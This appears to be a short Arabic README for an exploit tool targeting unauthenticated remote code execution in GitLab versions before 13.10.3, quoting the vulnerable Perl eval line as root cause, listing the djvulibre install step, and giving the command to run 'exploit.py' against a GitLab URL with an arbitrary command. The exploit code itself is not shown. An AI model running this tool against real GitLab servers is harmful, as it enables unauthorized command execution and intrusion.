
استغلال ثغرة تنفيذ أكواد عن بُعد دون مصادقة لـ gitlab الإصدار < 13.10.3
لأغراض تعليمية/بحثية فقط. استخدمه على مسؤوليتك الخاصة
السبب الجذري:
# convert C escape sequences (allowed in quoted text)
$tok = eval qq{"$tok"};
تحتاج إلى تثبيت djvumake و djvulibre ليعمل
ثبّت djvulibre ( إذا لم تكن قد ثبّتّه بعد )
sudo apt-get install -y djvulibre-bin
شغّل الاستغلال
python3 exploit.py -t <gitlab_url> -c <command>
تم اختباره على الإصدار 13.10.1-ce.0